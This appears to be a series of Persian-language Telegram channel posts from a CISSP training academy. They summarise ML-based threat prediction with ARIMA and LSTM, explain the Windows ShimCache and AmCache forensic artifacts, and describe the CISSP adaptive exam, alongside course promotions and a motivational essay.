در مقاله‌ای منتشرشده در JETIR، پلتفرم پیشنهادی از ترکیب ARIMA و LSTM استفاده کرده تا حملات سایبری بالقوه را بر اساس تحلیل داده‌های تاریخی پیش‌بینی کند. این مدل‌ها با شناسایی روابط میان الگوهای گذشته و پیش‌بینی نقاط غیرعادی، به سازمان‌ها این امکان را داده‌اند تا به جای رویکردهای واکنشی سنتی، به روش‌های فعالانه و پیشگیرانه مهاجمین را شناسایی کنند.
https://www.jetir.org/download1.php?file=JETIR2503642.pdf


مزایای استفاده از ماشین‌لرنینگ و مدل‌های سری زمانی

1. دقت بالاتر در شناسایی تهدیدات
مدل‌های ARIMA و LSTM با تمرکز بر تحلیل‌های تاریخی و پیش‌بینی روندهای آینده، قادر به شناسایی نقاط غیرعادی هستند که در رویکردهای سنتی ممکن است پنهان بمانند.

2. شناسایی تهدیدات نوظهور و پیش‌بینی حملات
به کمک این مدل‌ها، سازمان‌ها می‌توانند تهدیداتی را که هنوز در مراحل اولیه قرار دارند شناسایی و پیش‌بینی کنند و اقدامات لازم را پیش از آسیب‌دیدگی انجام دهند.

3. ترکیب با سیستم‌های هوش مصنوعی
این الگوریتم‌ها می‌توانند در کنار فناوری‌های دیگر مثل هوش مصنوعی و دانش سایبری، بهبود قابل توجهی در خودکارسازی فرآیند هانت سایبری ایجاد کنند.


چالش‌ها و محدودیت‌ها

1. نیاز به داده‌های با کیفیت بالا

اثربخشی این مدل‌ها به کیفیت داده‌های تاریخی بستگی دارد. داده‌های ناقص یا آلوده می‌توانند نتایج پیش‌بینی را به شدت تحت تأثیر قرار دهند.

2. پیچیدگی مدل‌سازی
مدل‌های ARIMA نیازمند تنظیم دقیق پارامترها برای دقت بالا هستند، در حالی که مدل‌های LSTM به منابع محاسباتی قوی برای پردازش حجم زیاد داده نیاز دارند.

3. محدودیت در شناسایی رفتارهای جدید مهاجمان

این مدل‌ها به شدت بر داده‌های تاریخی وابسته هستند و ممکن است در شناسایی تهدیدات جدید یا نوظهور که الگویی متفاوت دارند، دچار محدودیت شوند.


نتیجه‌گیری

استفاده از ماشین‌لرنینگ و مدل‌های سری زمانی مانند ARIMA و LSTM در حوزه هانت سایبری، سازمان‌ها را قادر ساخته است تا به جای واکنش به حملات، به پیش‌بینی و شناسایی زودهنگام تهدیدات بپردازند. این رویکرد نه تنها دقت در شناسایی را بالا برده بلکه زمان پاسخ‌دهی را به شدت کاهش داده است. با وجود چالش‌ها، استفاده از این مدل‌ها همراه با هوش مصنوعی و تحلیل‌های پیشرفته، آینده‌ای مطمئن‌تر برای امنیت سایبری فراهم خواهد کرد.

#آکادمی_روزبه
مرکز تخصصی CISSP
20 درصد تخفیف با سرمایه گذاری شرکت هامون

آکادمی آموزش روزبه 📚

06 May 2025 12:02

شرکت هامون بخاطر مسوولیت اجتماعی ؛ بجای شما ۲۰ درصد از هزینه ۱۹ م تومانی دوره CISSP را پرداخت می‌کند.

تا ۲۰ اردیبهشت میتوانید از این فرصت استفاده کنید

فقط برای اشخاص در ایران

واتس اپ 09902857290
Www.haumoun.com

آکادمی آموزش روزبه 📚

05 May 2025 12:05

پس از شب

✍️ روزبه نوروزی
برای شروعی دوباره

در ژرفنای شب‌های تار، آن‌گاه که همه چیز فرو ریخته و صداها خاموش شده‌اند، روح انسان، اگرچه زخم‌خورده و فرورفته در خاکستر ناکامی، جرقه‌ای از امید را در خویش می‌پروراند. شکست، اگرچه خنجری است در قلب آرزوها، اما گاه، همان زخم است که راهی به روشنی می‌گشاید؛ زخمی که می‌آموزد، پالایش می‌کند، و از دلِ سکوتِ فرود، آوازِ صعود می‌سازد.

بازگشت به میدان، بازگشتِ جسم نیست، خیزشِ جان است. آن‌که زمین خورده، اگر دل در آتش نهاد و به جای ناله، نغمه‌ی اراده سر داد، از ویرانه‌های شکست، قصری از عزم بنا خواهد کرد. چه بسیارند آنان که افتادند و در همان افتادن، بذر ققنوس‌وار بیداری خویش را در خاک ریختند.

مقاومت، نه فقط پایداری در برابر سختی، که ترجمه‌ی اراده در قاموس رنج است. هر گامی که در مسیر بازگشت برداشته می‌شود، شهادتی است بر بی‌مرگی امید؛ و هر ایستادگی، بیانی‌ست از این حقیقت جاودانه که انسان، حتی در سیاه‌ترین لحظه‌ها، می‌تواند برخیزد، بدرخشد و بار دیگر میدان را از آن خویش کند.

آری، آن‌که از دلِ تاریکی‌ها می‌گذرد، خورشید را بهتر درمی‌یابد. و آن‌که از خاکستر خویش برخیزد، دیگر نه انسانی شکست‌خورده، که افسانه‌ای زنده خواهد بود.

تقدیم به همه ی آنها که نقشی هرچند بزرگ یا کوچک ( چه مثبت و چه منفی) در این چند سال اخیر تاکنون داشتند.

💫بماند به یادگار اردیبهشت ۱۴۰۴ تهران ایران

❇️ افتتاح مجدد سایت #آکادمی_روزبه
Www.Roozbeh.academy
فاز اول

آکادمی آموزش روزبه 📚

04 May 2025 20:53

دو ردپای فارنزیک

🔍 معرفی کلی
این ShimCacheو AmCache بخشی از زیرساخت Application Compatibility ویندوز هستند که برای اجرای برنامه‌های قدیمی روی سیستم‌های جدید طراحی شده‌اند. این آرتیفکت‌ها یا همان ردپا ؛ متادیتای مرتبط با فایل‌های اجرایی و برنامه‌های نصب‌شده را ذخیره می‌کنند و از این رو، منابع مهمی برای تحلیل‌گران فارنزیک محسوب می‌شوند.


🧩مقوله ی AmCache چیست؟

محل ذخیره‌سازی:فایل رجیستری با فرمت REGF در مسیر C:\Windows\AppCompat\Programs\Amcache.hve (در نسخه‌های قدیمی‌تر: C:\AppCompat\Programs\RecentFileCache.bcf)
اطلاعات ذخیره‌شده: متادیتای مرتبط با برنامه‌های نصب‌شده، فایل‌های اجرایی، درایورها و موارد دیگر
محدودیت‌ها:

* هش SHA1 فقط برای فایل‌هایی تا ۳۰ مگابایت محاسبه می‌شود.
* اطلاعاتی مانند آرگومان‌های فرآیند، کاربر اجراکننده یا زمان اجرا را شامل نمی‌شود.
* به دلیل پیچیدگی ساختار، تغییرات متعدد در نسخه‌های مختلف و محدودیت‌های فوق، بهتر است از AmCache به‌عنوان مدرکی برای وجود فایل‌ها استفاده شود، نه اثبات اجرای آن‌ها.



🧩 مقوله ی ShimCache چیست؟

محل ذخیره‌سازی: در رجیستری ویندوز، مسیر HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache
* اطلاعات ذخیره‌شده: مسیر فایل، تاریخ آخرین دسترسی، و در برخی نسخه‌ها، زمان اجرای فایل
محدودیت‌ها:

* عدم وجود هش فایل یا اطلاعات کاربر اجراکننده
* ممکن است شامل فایل‌هایی باشد که هرگز اجرا نشده‌اند (مثلاً فقط مشاهده‌شده‌اند).
* ساختار و فرمت داده‌ها در نسخه‌های مختلف ویندوز متفاوت است.



🛠 ابزارهای تحلیل

برای تحلیل این آرتیفکت‌ها، ابزارهای مختلفی وجود دارند:

* ابزار Cyber Triage: ابزاری تجاری برای جمع‌آوری و تحلیل داده‌های فارنزیک از سیستم‌های ویندوزی.
* ابزار AmCacheParser: ابزاری متن‌باز برای استخراج و تحلیل داده‌های AmCache.
* ابزارAppCompatCacheParser: ابزاری متن‌باز برای تحلیل داده‌های ShimCache.


✅ نکات کلیدی برای تحلیل‌گران

* هر دو آرتیفکت می‌توانند وجود فایل‌ها را حتی پس از حذف آن‌ها از دیسک اثبات کنند.
* هیچ‌کدام به‌تنهایی برای اثبات اجرای یک برنامه کافی نیستند؛ بهتر است با سایر آرتیفکت‌ها مانند Prefetch یا Event Logs ترکیب شوند.
* تغییرات در ساختار این آرتیفکت‌ها در نسخه‌های مختلف ویندوز می‌تواند تحلیل را پیچیده کند؛ بنابراین، آشنایی با نسخه‌های مختلف و ابزارهای مناسب ضروری است.

#آکادمی_روزبه
مبحث جرم شناسی و فارنزیک درس CISSP

آکادمی آموزش روزبه 📚

04 May 2025 08:29

آزمون رسمی CISSP چگونه است؟
بخش اول : CAT

روش CAT (Computerized Adaptive Testing) که توسط سازمان ISC2 برای آزمون‌های CISSP و سایر گواهینامه‌ها استفاده می‌شود، یک شیوه نوین و هوشمندانه برای ارزیابی توانمندی‌های داوطلبان است. این روش با هدف افزایش دقت، کارایی و امنیت آزمون طراحی شده است.

نحوه عملکرد آزمون CAT

در آزمون CAT، هر داوطلب با سؤالاتی مواجه می‌شود که به‌صورت پویا و بر اساس عملکرد قبلی او انتخاب می‌شوند. فرآیند به این صورت است:

1. شروع با سؤالات ساده‌تر: آزمون با سؤالی آغاز می‌شود که سطح دشواری آن پایین‌تر از حد استاندارد قبولی است.

2. تنظیم سطح دشواری: پس از هر پاسخ، الگوریتم آزمون توانایی داوطلب را مجدداً ارزیابی می‌کند و بر اساس آن، سؤال بعدی را با سطح دشواری مناسب انتخاب می‌کند.

3. هدف‌گیری دقت ۵۰٪: سیستم سعی می‌کند سؤالاتی ارائه دهد که احتمال پاسخ صحیح داوطلب به آن‌ها حدود ۵۰٪ باشد، تا بتواند سطح واقعی توانایی او را به‌دقت تعیین کند.

4. تعیین پایان آزمون: آزمون زمانی پایان می‌یابد که سیستم با اطمینان ۹۵٪ بتواند تصمیم بگیرد که داوطلب موفق شده یا نه، یا زمانی که حداکثر تعداد سؤالات مجاز پاسخ داده شده باشد.

مشخصات آزمون CISSP در قالب CAT

* تعداد سؤالات: بین ۱۰۰ تا ۱۵۰ سؤال، که شامل ۲۵ سؤال آزمایشی (بدون نمره) نیز می‌شود.

* حداقل سؤالات نمره‌دار: داوطلب باید حداقل به ۷۵ سؤال نمره‌دار پاسخ دهد.

* مدت زمان آزمون: کاهش یافته از ۶ ساعت به حداکثر ۳ ساعت

نمره قبولی: کسب حداقل ۷۰۰ از ۱۰۰۰ نمره ممکن.

فرمت سؤالات: چندگزینه‌ای و سؤالات نوآورانه پیشرفته.

زبان‌های موجود: انگلیسی، چینی، آلمانی، ژاپنی و اسپانیایی.

مزایای استفاده از CAT

ارزیابی دقیق‌تر و کارآمدتر: با تنظیم سطح دشواری سؤالات بر اساس عملکرد داوطلب، ارزیابی دقیق‌تری از توانمندی‌های او به‌دست می‌آید.

کاهش مدت زمان آزمون: در مقایسه با آزمون‌های سنتی، CAT مدت زمان کمتری برای ارزیابی نیاز دارد. مثلا قبلا CISSP به مدت ۶ ساعت برگزار می‌شد.

افزایش امنیت آزمون: با تنوع سؤالات و ترتیب آن‌ها برای هر داوطلب، احتمال تقلب کاهش می‌یابد.

تجربه شخصی‌سازی‌شده برای داوطلبان: هر داوطلب با مسیر آزمونی منحصربه‌فرد مواجه می‌شود که متناسب با سطح توانایی اوست.

تغییرات آینده در آزمون‌های ISC2

از ۱ اکتبر ۲۰۲۵، آزمون‌های CC، CCSP و SSCP نیز به‌طور انحصاری در قالب CAT ارائه خواهند شد. تا آن زمان، این آزمون‌ها همچنان در قالب سنتی نیز در دسترس خواهند بود.


#آکادمی_روزبه
ارائه دهنده دوره آمادگی آزمون رسمی CISSP
واتس اپ 09902857290

آکادمی آموزش روزبه 📚

03 May 2025 21:34

دوره رایگان

#آکادمی_روزبه

https://redteamleaders.coursestack.com/courses/96e8cffc-ac6e-4605-b7e1-39c6c26bd2e8